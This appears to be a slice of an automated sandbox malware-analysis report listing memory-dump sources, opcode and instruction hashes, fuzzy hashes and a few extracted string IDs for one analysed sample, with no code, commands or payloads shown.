                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c1fcccdd028ba1a1bce0ab663a053627391c7ee7bc323742a98af333391ba306
                                                                                                                    • Instruction ID: 0276843756a64bc19d78b05e4d4da7d1d84b1e526e53bb0ac3ba4ab30a75c6cc
                                                                                                                    • Opcode Fuzzy Hash: c1fcccdd028ba1a1bce0ab663a053627391c7ee7bc323742a98af333391ba306
                                                                                                                    • Instruction Fuzzy Hash: 5C21C0B5D01259ABCB10DF9AD884ACEFFB4FB49310F10812AE918B7250C774A954CFA5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7ee45c732c23ceb4741add7e422a7d1774572e3d7d6bb82008fcd18ba451a84e
                                                                                                                    • Instruction ID: 99e222e671063d9015783054216a8690c41cdd2331668c17b7fd2a050c3d7725
                                                                                                                    • Opcode Fuzzy Hash: 7ee45c732c23ceb4741add7e422a7d1774572e3d7d6bb82008fcd18ba451a84e
                                                                                                                    • Instruction Fuzzy Hash: 21018436B140256BDF54AA6DDC106AF77AFDBC9710F00443AE509E7240EE69DC0687E2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d7bfd21af744248a0dbc61c2e7dbc2653cedbf16279f67198a93b055f538ba23
                                                                                                                    • Instruction ID: cef64476cac64fc19aead9a339e32dec515d3524cbc81c529042c986504d6e46
                                                                                                                    • Opcode Fuzzy Hash: d7bfd21af744248a0dbc61c2e7dbc2653cedbf16279f67198a93b055f538ba23
                                                                                                                    • Instruction Fuzzy Hash: 8B11F0B6D002598FDB20DF9AC844ADEFBF4EF89320F10842EE959A7210C375A545CFA5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7611e0c7e7a747b692c6023c48b5f4bc635eeda1a21c19b206601aa6b62f5d2b
                                                                                                                    • Instruction ID: cf8d96d0be74886460c5164ffd935197ed70fb2d088424299928a7a796efd752
                                                                                                                    • Opcode Fuzzy Hash: 7611e0c7e7a747b692c6023c48b5f4bc635eeda1a21c19b206601aa6b62f5d2b
                                                                                                                    • Instruction Fuzzy Hash: 9C11AFB5D01259AFCB10DF9AD884ADEFFB4FB49324F10812AE918A7250C374A954CFA5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8fbec80bfc32bfe4eae85c803e77bc7b6192dd68297f1bc90897212601d33b5f
                                                                                                                    • Instruction ID: 5d9ad1ad5550334ba64e0897a7e5b4de1841c63a7a43208c7ba42a454a247c11
                                                                                                                    • Opcode Fuzzy Hash: 8fbec80bfc32bfe4eae85c803e77bc7b6192dd68297f1bc90897212601d33b5f
                                                                                                                    • Instruction Fuzzy Hash: 4C016D31B000222BDF64A66DA45472FE3DADBCBA14F20883AE50ACB384D969DC4647A5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6c72562341325553635bb040287d5a9f54450b8f2b04fc24312a31248d9a67cb
                                                                                                                    • Instruction ID: 6008eb287c5f72b83b6e60427088f233e6f1e887f27da4bf59864723484dfb97
                                                                                                                    • Opcode Fuzzy Hash: 6c72562341325553635bb040287d5a9f54450b8f2b04fc24312a31248d9a67cb
                                                                                                                    • Instruction Fuzzy Hash: 33018C31B400226BCB65A62DA85472EA3DAEBCA718F148839E10FCB340EE25DC834795
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5530830f3c9403c1cce296ae4772585d2c10938f51ee57e727b24e4f3e885473
                                                                                                                    • Instruction ID: cec6eaac3a5377a11f8f769035a1b6f2289e3e19e4417a8dea7efd4883d7a4b7
                                                                                                                    • Opcode Fuzzy Hash: 5530830f3c9403c1cce296ae4772585d2c10938f51ee57e727b24e4f3e885473
                                                                                                                    • Instruction Fuzzy Hash: EF018F35B440228FDB65EB3CE45471EB7E6EB8A714F14887EE20ECB741DA29DC018B85
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ad3d55d6fc9c67387ceac249b3518c3807f53bf6168cb69b0e553b2778a04c9b
                                                                                                                    • Instruction ID: 1a7fc4fd6b2ca5d6b022dfad10df5b0594de1699de144f965dbc20e084795310
                                                                                                                    • Opcode Fuzzy Hash: ad3d55d6fc9c67387ceac249b3518c3807f53bf6168cb69b0e553b2778a04c9b
                                                                                                                    • Instruction Fuzzy Hash: 12016D35B000215FDB64EB2DE45471EB3D6E78A714F108839E60ECB340DA25DC014BC5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b8d723b2b826c64c4e42e7f148174af540be89d5e710e55216e6ee79ba30f874
                                                                                                                    • Instruction ID: a27de8206bbdf4881da62b1262369b6ec95f5b9045a9a0583dc3f45796621edc
                                                                                                                    • Opcode Fuzzy Hash: b8d723b2b826c64c4e42e7f148174af540be89d5e710e55216e6ee79ba30f874
                                                                                                                    • Instruction Fuzzy Hash: 40F0EC32F202749BDB54AA79EC00A9EB73AE784364F004435ED02FB740DA756C00C7D0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 03f7a7a52af8f187be450c4d356df6ff666a4cb81608804c98cf0e4a0c113bc7
                                                                                                                    • Instruction ID: d358c5d983461c53a8f97c8a48cae00d3e5f03d6996ac33247dfb8d5e3ae6eb7
                                                                                                                    • Opcode Fuzzy Hash: 03f7a7a52af8f187be450c4d356df6ff666a4cb81608804c98cf0e4a0c113bc7
                                                                                                                    • Instruction Fuzzy Hash: 6CE0D871E212196BDB50EFB8CA5574B77AFD741204F108DA5E408CF201E136CE0247D1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2222239885
                                                                                                                    • Opcode ID: 3133dfa049ab1ec686e68fbb0f0d901401cd8ef04cd8dd659b39a039768bb9d2
                                                                                                                    • Instruction ID: 85b9897b57c8bacd0ca31418e7f0f6fb1fabb1399790295ceacfaf910d8aa596
                                                                                                                    • Opcode Fuzzy Hash: 3133dfa049ab1ec686e68fbb0f0d901401cd8ef04cd8dd659b39a039768bb9d2
                                                                                                                    • Instruction Fuzzy Hash: 28122B30E4022A8FDB68EF69C954A5EB7B2BF84704F208569D409AB354DB34DE85CF91
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-3823777903
                                                                                                                    • Opcode ID: a037c5cb84c3b27ed6c16f94226949e0c538334cdaf406dbee810c9ba4f0d5af
                                                                                                                    • Instruction ID: 5477be27dc62659e1f4ed5b20ffb64646bdf5d696527a318a59a4f721d70bf58
                                                                                                                    • Opcode Fuzzy Hash: a037c5cb84c3b27ed6c16f94226949e0c538334cdaf406dbee810c9ba4f0d5af
                                                                                                                    • Instruction Fuzzy Hash: CA918030E8021ADFEB68EF68D654B6EB7B2FF84700F108529D506AB354DB389C45CB90
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-390881366
                                                                                                                    • Opcode ID: cdbfcb219fdd3b8b6cf65ac896e887b5a8417ed3c5cc598106350e85eae411a2
                                                                                                                    • Instruction ID: 3d7d097b8cd382b045f907de83bd1172a8cad2f40807c47e8f7804df94589585
                                                                                                                    • Opcode Fuzzy Hash: cdbfcb219fdd3b8b6cf65ac896e887b5a8417ed3c5cc598106350e85eae411a2
                                                                                                                    • Instruction Fuzzy Hash: 8EF13F30A40219CFDB58EFA8D594A6EB7B3FF84300F248569D406AB364DB39DD46CB90
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2125118731
                                                                                                                    • Opcode ID: 3f64e844e93dfc5e7e57c9c479d8289ea3833149899ae2effa039e48004d0358
                                                                                                                    • Instruction ID: da4420897493c714954484bb0e32cbe33d55e4e78888bba152608315df69f24a
                                                                                                                    • Opcode Fuzzy Hash: 3f64e844e93dfc5e7e57c9c479d8289ea3833149899ae2effa039e48004d0358
                                                                                                                    • Instruction Fuzzy Hash: A1B12D30A40219CFDB58EF69D58466EB7B2FF84304F248529E4069B395DB79DC86CB90
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: LR^q$LR^q$$^q$$^q
                                                                                                                    • API String ID: 0-2454687669
                                                                                                                    • Opcode ID: 7a952b745357c57ae346a10b1e261be41c9b751a2c4837ca95266a175b9a1fa9
                                                                                                                    • Instruction ID: 11f2d89ae08d361791f142bed246e3568f66f9939262573c287f71ec5d0062fa
                                                                                                                    • Opcode Fuzzy Hash: 7a952b745357c57ae346a10b1e261be41c9b751a2c4837ca95266a175b9a1fa9
                                                                                                                    • Instruction Fuzzy Hash: B0519130B402168FDB58EF6CD944A6AB7E2FF84304F148569E506AF395DB38EC45CB91
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2125118731
                                                                                                                    • Opcode ID: cd96eb1d87ab052f4236001a9d299a31b2cf296fe5f75298426693d764ecd826
                                                                                                                    • Instruction ID: b495dbd1c3ea289de565752192b07b2a05e847b4035753808ccf4f8ff9a14355
                                                                                                                    • Opcode Fuzzy Hash: cd96eb1d87ab052f4236001a9d299a31b2cf296fe5f75298426693d764ecd826
                                                                                                                    • Instruction Fuzzy Hash: FC517E30E502268FDF65EF68E58066EB3F2EB85310F148529DA06EB354DB34DC42CB91